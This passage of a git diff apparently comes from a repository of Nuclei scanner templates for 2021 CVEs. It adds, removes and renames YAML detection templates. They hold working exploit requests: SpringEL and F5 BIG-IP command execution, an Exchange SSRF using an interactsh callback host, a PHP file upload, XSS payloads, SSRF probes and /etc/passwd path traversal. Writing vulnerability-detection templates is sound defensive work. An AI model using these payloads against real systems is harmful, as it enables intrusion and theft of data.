way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution. + reference: + - https://github.com/SecCoder-Security-Lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053 + - https://tanzu.vmware.com/security/cve-2021-22053 + - https://nvd.nist.gov/vuln/detail/CVE-2021-22053 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2021-22053 + cwe-id: CWE-94 + cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:* + epss-score: 0.80689 + tags: rce,spring,cve,cve2021 + metadata: + max-request: 1 + +http: + - method: GET + path: + - '{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("nslookup {{interactsh-url}}")}__::.x/' + + matchers-condition: and + matchers: + + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: status + status: + - 500 + +# Enhanced by mp on 2022/06/27 diff --git a/nuclei-templates/CVE-2021/CVE-2021-22054.yaml b/nuclei-templates/CVE-2021/CVE-2021-22054.yaml new file mode 100644 index 0000000000..1599beb9ec --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-22054.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-22054 +info: + name: VMWare Workspace ONE UEM - Server-Side Request Forgery + author: h1ei1 + severity: high + description: VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information. + reference: + - https://blog.assetnote.io/2022/04/27/vmware-workspace-one-uem-ssrf/ + - https://www.vmware.com/security/advisories/VMSA-2021-0029.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-22054 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-22054 + cwe-id: CWE-918 + metadata: + fofa-query: banner="/AirWatch/default.aspx" || header="/AirWatch/default.aspx" + tags: cve,cve2021,vmware,workspace,ssrf +requests: + - method: GET + path: + - "{{BaseURL}}/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A" + matchers-condition: and + matchers: + - type: word + words: + - "Interactsh Server" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/27 diff --git a/nuclei-templates/CVE-2021/cve-2021-22214.yaml b/nuclei-templates/CVE-2021/CVE-2021-22214.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-22214.yaml rename to nuclei-templates/CVE-2021/CVE-2021-22214.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-22986.yaml b/nuclei-templates/CVE-2021/CVE-2021-22986.yaml new file mode 100644 index 0000000000..08212fc078 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-22986.yaml @@ -0,0 +1,60 @@ +id: CVE-2021-22986 + +info: + name: F5 BIG-IP iControl REST - Remote Command Execution + author: rootxharsh,iamnoooob + severity: critical + description: F5 BIG-IP iControl REST interface is susceptible to an unauthenticated remote command execution vulnerability. + reference: + - https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986 + - https://support.f5.com/csp/article/K03009991 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22986 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-22986 + tags: bigip,cve,cve2021,rce,mirai + +requests: + - raw: + - | + POST /mgmt/shared/authn/login HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Authorization: Basic YWRtaW46 + Content-Type: application/json + Cookie: BIGIPAuthCookie=1234 + + {"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}} + - | + POST /mgmt/tm/util/bash HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + X-F5-Auth-Token: {{token}} + Content-Type: application/json + + {"command":"run","utilCmdArgs":"-c id"} + + extractors: + - type: regex + part: body + internal: true + name: token + group: 1 + regex: + - "([A-Z0-9]{26})" + + - type: regex + part: body + group: 1 + regex: + - "\"commandResult\":\"(.*)\"" + + matchers: + - type: word + words: + - "commandResult" + - "uid=" + condition: and + +# Enhanced by mp on 2022/05/05 diff --git a/nuclei-templates/CVE-2021/cve-2021-23241.yaml b/nuclei-templates/CVE-2021/CVE-2021-23241.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-23241.yaml rename to nuclei-templates/CVE-2021/CVE-2021-23241.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24210.yaml b/nuclei-templates/CVE-2021/CVE-2021-24210.yaml new file mode 100644 index 0000000000..31f45a6ce6 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-24210.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-24210 + +info: + name: PhastPress < 1.111 - Open Redirect + author: 0x_Akoko + severity: medium + description: | + There is an open redirect in the PhastPress WordPress plugin before 1.111 that allows an attacker to malform a request to a page + with the plugin and then redirect the victim to a malicious page. There is also a support comment from another user one year + ago (https://wordpress.org/support/topic/phast-php-used-for-remote-fetch/) that says that the php involved in the request only + go to whitelisted pages but it's possible to redirect the victim to any domain. + reference: + - https://wpscan.com/vulnerability/9b3c5412-8699-49e8-b60c-20d2085857fb + - https://plugins.trac.wordpress.org/changeset/2497610/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24210 + cwe-id: CWE-601 + tags: wordpress,cve,cve2021,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' + part: header diff --git a/nuclei-templates/CVE-2021/CVE-2021-24278.yaml b/nuclei-templates/CVE-2021/CVE-2021-24278.yaml deleted file mode 100644 index 2726ff50c0..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-24278.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2021-24278 -info: - name: Redirection for Contact Form 7 < 2.3.4 - Unauthenticated Arbitrary Nonce Generation - author: 2rs3c - severity: high - description: In the Redirection for Contact Form 7 WordPress plugin before 2.3.4, unauthenticated users can use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function. - reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24278 - - https://wpscan.com/vulnerability/99f30604-d62b-4e30-afcd-b482f8d66413 - - https://www.wordfence.com/blog/2021/04/severe-vulnerabilities-patched-in-redirection-for-contact-form-7-plugin/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-24278 - tags: cve,cve2021,wordpress,wp-plugin -requests: - - method: POST - path: - - "{{BaseURL}}/wp-admin/admin-ajax.php" - headers: - Content-Type: application/x-www-form-urlencoded - body: "action=wpcf7r_get_nonce¶m=wp_rest" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - part: body - regex: - - '"success":true' - - '"nonce":"[a-f0-9]+"' - condition: and - extractors: - - type: regex - part: body - regex: - - '"nonce":"[a-f0-9]+"' diff --git a/nuclei-templates/CVE-2021/CVE-2021-24286.yaml b/nuclei-templates/CVE-2021/CVE-2021-24286.yaml new file mode 100644 index 0000000000..57bfb2788c --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-24286.yaml @@ -0,0 +1,51 @@ +id: CVE-2021-24286 + +info: + name: WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue. + remediation: Fixed in version 1.3.1 + reference: + - https://wpscan.com/vulnerability/b9a535f3-cb0b-46fe-b345-da3462584e27 + - https://www.exploit-db.com/exploits/50350 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24286 + - https://wordpress.org/plugins/redirect-404-to-parent/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24286 + cwe-id: CWE-79 + epss-score: 0.00177 + epss-percentile: 0.54812 + cpe: cpe:2.3:a:mooveagency:redirect_404_to_parent:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 2 + vendor: mooveagency + product: redirect_404_to_parent + framework: wordpress + tags: xss,cve,cve2023,wordpress,wpscan,authenticated,exploitdb,wp-plugin + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/options-general.php?page=moove-redirect-settings&tab=%22+style%3Danimation-name%3Arotation+onanimationstart%3D%22alert%28document.domain%29%3B HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "alert%28document.domain%29") && contains(body_2, "Moove redirect 404")' + - 'status_code_2 == 200' + condition: and +# digest: 4b0a00483046022100f9cb4a9989d9a6c8e51a84b50c83adfe8dd1862d76123f44c6f1dd2e546315fe022100dd202502856b6e58ca89e353ffc2a0c9d4d1f510ada3193504bf8f4b24f917ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24499.yaml b/nuclei-templates/CVE-2021/CVE-2021-24499.yaml deleted file mode 100644 index ec9b42b879..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-24499.yaml +++ /dev/null @@ -1,54 +0,0 @@ -id: CVE-2021-24499 - -info: - name: WordPress Workreap - Remote Code Execution - author: daffainfo - severity: critical - description: WordPress Workreap theme is susceptible to remote code execution. The AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts. - reference: - - https://github.com/RyouYoo/CVE-2021-24499 - - https://nvd.nist.gov/vuln/detail/CVE-2021-24499 - - https://wpscan.com/vulnerability/74611d5f-afba-42ae-bc19-777cdf2808cb - - https://jetpack.com/2021/07/07/multiple-vulnerabilities-in-workreap-theme/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-24499 - cwe-id: CWE-434 - tags: cve,cve2021,wordpress,wp-plugin,rce,intrusive,wp,workreap - -requests: - - raw: - - | - POST /wp-admin/admin-ajax.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=------------------------cd0dc6bdc00b1cf9 - X-Requested-With: XMLHttpRequest - - -----------------------------cd0dc6bdc00b1cf9 - Content-Disposition: form-data; name="action" - - workreap_award_temp_file_uploader - -----------------------------cd0dc6bdc00b1cf9 - Content-Disposition: form-data; name="award_img"; filename="{{randstr}}.php" - Content-Type: application/x-httpd-php - - - -----------------------------cd0dc6bdc00b1cf9-- - - - | - GET /wp-content/uploads/workreap-temp/{{randstr}}.php HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - "71abe5077dae2754c36d731cc1534d4d" - - - type: status - status: - - 200 -# Enhanced by mp on 2022/05/16 diff --git a/nuclei-templates/CVE-2021/cve-2021-26084.yaml b/nuclei-templates/CVE-2021/CVE-2021-26084.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-26084.yaml rename to nuclei-templates/CVE-2021/CVE-2021-26084.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-26086.yaml b/nuclei-templates/CVE-2021/CVE-2021-26086.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-26086.yaml rename to nuclei-templates/CVE-2021/CVE-2021-26086.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-26475.yaml b/nuclei-templates/CVE-2021/CVE-2021-26475.yaml deleted file mode 100644 index fe90ee9d9f..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-26475.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2021-26475 - -info: - name: EPrints 3.4.2 XSS - author: geeknik - severity: medium - description: EPrints 3.4.2 exposes a reflected XSS opportunity in the via a cgi/cal URI. - reference: - - https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf - - https://files.eprints.org/2548/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-26475 - cwe-id: CWE-79 - tags: cve,cve2021,xss,eprints - -requests: - - method: GET - path: - - "{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - - type: word - part: header - words: - - "text/html" diff --git a/nuclei-templates/CVE-2021/CVE-2021-26598.yaml b/nuclei-templates/CVE-2021/CVE-2021-26598.yaml deleted file mode 100644 index ef2052edd2..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-26598.yaml +++ /dev/null @@ -1,67 +0,0 @@ -id: CVE-2021-26598 - -info: - name: ImpressCMS <1.4.3 - Incorrect Authorization - author: gy741,pdteam - severity: medium - description: ImpressCMS before 1.4.3 is susceptible to incorrect authorization via include/findusers.php. An attacker can provide a security token and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. - remediation: | - Upgrade to ImpressCMS version 1.4.3 or later to fix the vulnerability. - reference: - - https://hackerone.com/reports/1081137 - - http://karmainsecurity.com/KIS-2022-03 - - https://github.com/ImpressCMS - - https://nvd.nist.gov/vuln/detail/CVE-2021-26598 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2021-26598 - cwe-id: CWE-287 - epss-score: 0.00506 - epss-percentile: 0.73786 - cpe: cpe:2.3:a:impresscms:impresscms:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: impresscms - product: impresscms - shodan-query: http.html:"ImpressCMS" - tags: hackerone,cve,cve2021,impresscms,unauth,cms - -http: - - raw: - - | - GET /misc.php?action=showpopups&type=friend HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 - - | - GET /include/findusers.php?token={{token}} HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 - - cookie-reuse: true - req-condition: true - - matchers-condition: and - matchers: - - type: word - part: body_2 - words: - - 'last_login' - - 'user_regdate' - - 'uname' - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - name: token - group: 1 - regex: - - "REQUEST' value='(.*?)'" - - 'REQUEST" value="(.*?)"' - internal: true - -# digest: 4b0a00483046022100b45f327e67d77969dc74e380e5076df833318059932eb8f7d4a54faf8c21145f022100f2f05c3690daee463025e4e1ceaadaab6907e2779464c2da9c3cd914dae7ad3b:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/CVE-2021/CVE-2021-26702.yaml b/nuclei-templates/CVE-2021/CVE-2021-26702.yaml new file mode 100644 index 0000000000..67a641543d --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-26702.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-26702 +info: + name: EPrints 3.4.2 XSS + author: ritikchaddha + severity: medium + description: EPrints 3.4.2 exposes a reflected XSS opportunity in the dataset parameter to a cgi/dataset_ dictionary URI. + reference: + - https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf + - https://files.eprints.org/2548/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-26702 + cwe-id: CWE-79 + tags: cve,cve2021,xss,eprints +requests: + - method: GET + path: + - "{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + matchers-condition: and + matchers: + - type: word + words: + - "" + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-26722.yaml b/nuclei-templates/CVE-2021/CVE-2021-26722.yaml new file mode 100644 index 0000000000..0396e2cedf --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-26722.yaml @@ -0,0 +1,26 @@ +id: CVE-2021-26722 +info: + name: LinkedIn Oncall 1.4.0 XSS + author: pikpikcu + severity: medium + description: LinkedIn Oncall through 1.4.0 allows reflected XSS via /query because of mishandling of the "No results found for" message in the search bar. + reference: https://github.com/linkedin/oncall/issues/341 + tags: cve,cve2021,linkedin,xss + issues: https://github.com/linkedin/oncall/issues/341 +requests: + - method: GET + path: + - "{{BaseURL}}/query/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/all" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "" + part: body + - type: word + words: + - "text/html" + part: header diff --git a/nuclei-templates/CVE-2021/CVE-2021-26812.yaml b/nuclei-templates/CVE-2021/CVE-2021-26812.yaml new file mode 100644 index 0000000000..c6316beaa3 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-26812.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-26812 + +info: + name: Moodle jitsi plugin XSS + author: aceseven (digisec360) + description: Cross Site Scripting (XSS) in the Jitsi Meet 2.7 through 2.8.3 plugin for Moodle via the "sessionpriv.php" module. This allows attackers to craft a malicious URL, which when clicked on by users, can inject javascript code to be run by the application. + severity: medium + tags: cve,cve2021,moodle,jitsi,xss + reference: | + - https://github.com/udima-university/moodle-mod_jitsi/issues/67 + - https://nvd.nist.gov/vuln/detail/CVE-2021-26812 + +requests: + - method: GET + path: + - "{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "alert(document.domain);" + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "MoodleSession" \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-26855.yaml b/nuclei-templates/CVE-2021/CVE-2021-26855.yaml new file mode 100644 index 0000000000..ae5e857ac7 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-26855.yaml @@ -0,0 +1,34 @@ +id: CVE-2021-26855 + +info: + name: Microsoft Exchange Server SSRF Vulnerability + author: madrobot + severity: critical + description: This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. + reference: + - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855 + - https://proxylogon.com/#timeline + - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse + - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 + - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09 + remediation: Apply the appropriate security update. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-26855 + tags: cve,cve2021,ssrf,rce,exchange,oast,microsoft + +requests: + - raw: + - | + GET /owa/auth/x.js HTTP/1.1 + Host: {{Hostname}} + Cookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3; + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + +# Enhanced by mp on 2022/02/04 diff --git a/nuclei-templates/CVE-2021/CVE-2021-27309.yaml b/nuclei-templates/CVE-2021/CVE-2021-27309.yaml deleted file mode 100644 index 9c1806567b..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-27309.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2021-27309 -info: - name: Clansphere CMS 2011.4 - Reflected XSS - author: edoardottt - severity: medium - description: | - Clansphere CMS 2011.4 allows unauthenticated reflected XSS via "module" parameter. - reference: - - https://github.com/xoffense/POC/blob/main/Clansphere%202011.4%20%22module%22%20xss.md - - https://nvd.nist.gov/vuln/detail/CVE-2021-27309 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27309 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-27309 - cwe-id: CWE-79 - metadata: - verified: true - tags: cve,cve2021,clansphere,xss,cms,unauth -requests: - - method: GET - path: - - "{{BaseURL}}/mods/clansphere/lang_modvalidate.php?language=language&module=module%22>" - matchers-condition: and - matchers: - - type: word - part: body - words: - - '">.php' - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-27519.yaml b/nuclei-templates/CVE-2021/CVE-2021-27519.yaml new file mode 100644 index 0000000000..97b1350cae --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-27519.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-27519 +info: + name: FUDForum 3.1.0 - Reflected XSS + author: kh4sh3i + severity: medium + description: | + A cross-site scripting (XSS) issue in FUDForum 3.1.0 allows remote attackers to inject JavaScript + reference: + - https://www.exploit-db.com/exploits/49942 + - https://nvd.nist.gov/vuln/detail/CVE-2021-27519 + - https://github.com/fudforum/FUDforum/issues/2 + - http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-27519 + cwe-id: CWE-79 + metadata: + shodan-query: 'http.html:"Powered by: FUDforum"' + verified: "true" + tags: cve,cve2021,xss,fudforum +requests: + - method: GET + path: + - '{{BaseURL}}/index.php?SQ=0&srch=x"+onmouseover%3Dalert%281%29+x%3D"&t=search&btn_submit.x=0&btn_submit.y=0' + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'highlightSearchTerms("x" onmouseover=alert(1) x="");' + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-27651.yaml b/nuclei-templates/CVE-2021/CVE-2021-27651.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-27651.yaml rename to nuclei-templates/CVE-2021/CVE-2021-27651.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-27748.yaml b/nuclei-templates/CVE-2021/CVE-2021-27748.yaml new file mode 100644 index 0000000000..23f9aef7c7 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-27748.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-27748 +info: + name: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery + author: pdteam + severity: high + description: | + IBM WebSphere HCL Digital Experience is susceptible to server-side request forgery vulnerability that impacts on-premise deployments and containers. + reference: + - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/ + - https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748 + classification: + cve-id: CVE-2021-27748 + metadata: + verified: true + shodan-query: http.html:"IBM WebSphere Portal" + tags: cve,cve2021,hcl,ibm,ssrf,websphere +requests: + - method: GET + path: + - '{{BaseURL}}/docpicker/internal_proxy/http/interact.sh' + - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/interact.sh' + redirects: true + max-redirects: 2 + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "Interactsh Server" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-27850.yaml b/nuclei-templates/CVE-2021/CVE-2021-27850.yaml new file mode 100644 index 0000000000..22a15c83a9 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-27850.yaml @@ -0,0 +1,57 @@ +id: CVE-2021-27850 + +info: + name: Apache Tapestry - Arbitrary class download + description: | + A critical unauthenticated remote code execution vulnerability was found all recent versions of Apache Tapestry. The affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. The vulnerability I have found is a bypass of the fix for CVE-2019-0195. Recap: Before the fix of CVE-2019-0195 it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL. + author: pdteam + severity: critical + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2021-27850 + tags: cve,cve2021,apache,tapestry + +requests: + - raw: + - | + GET /assets/app/something/services/AppModule.class/ HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Connection: close + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Language: en-US,en;q=0.9 + - | + GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Connection: close + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Language: en-US,en;q=0.9 + + extractors: + - type: regex + regex: + - '\/assets\/app\/([a-z0-9]+)\/services\/AppMod' + internal: true + name: id + part: header + group: 1 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'application/java' + part: header + + - type: word + words: + - 'configuration' + - 'webtools' + part: body + condition: and diff --git a/nuclei-templates/CVE-2021/cve-2021-28150.yaml b/nuclei-templates/CVE-2021/CVE-2021-28150.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-28150.yaml rename to nuclei-templates/CVE-2021/CVE-2021-28150.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-28377.yaml b/nuclei-templates/CVE-2021/CVE-2021-28377.yaml new file mode 100644 index 0000000000..d55e6fcef0 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-28377.yaml @@ -0,0 +1,27 @@ +id: CVE-2021-28377 +info: + name: ChronoForums 2.0.11 - Directory Traversal + author: 0x_Akoko + severity: medium + description: The ChronoForums avatar function is vulnerable through unauthenticated path traversal attacks. This enables unauthenticated attackers to read arbitrary files, for example the Joomla! configuration file which contains credentials. + reference: + - https://herolab.usd.de/en/security-advisories/usd-2021-0007/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-28377 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2021-28377 + cwe-id: CWE-22 + tags: cve,cve2021,chronoforums,lfi,joomla +requests: + - method: GET + path: + - "{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-28937.yaml b/nuclei-templates/CVE-2021/CVE-2021-28937.yaml new file mode 100644 index 0000000000..afb05c10f6 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-28937.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-28937 + +info: + name: Acexy Wireless-N WiFi Repeater Password Disclosure + author: geeknik + severity: high + description: The password.html page of the Web management interface of the Acexy Wireless-N WiFi Repeater REV 1.0 contains the administrator account password in plaintext. + reference: + - https://blog-ssh3ll.medium.com/acexy-wireless-n-wifi-repeater-vulnerabilities-8bd5d14a2990 + - http://acexy.com + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-28937 + cwe-id: CWE-312 + tags: cve,cve2021,acexy,disclosure,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/password.html" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Password Setting" + - "addCfg('username'" + - "addCfg('newpass'" + condition: and diff --git a/nuclei-templates/CVE-2021/CVE-2021-29156.yaml 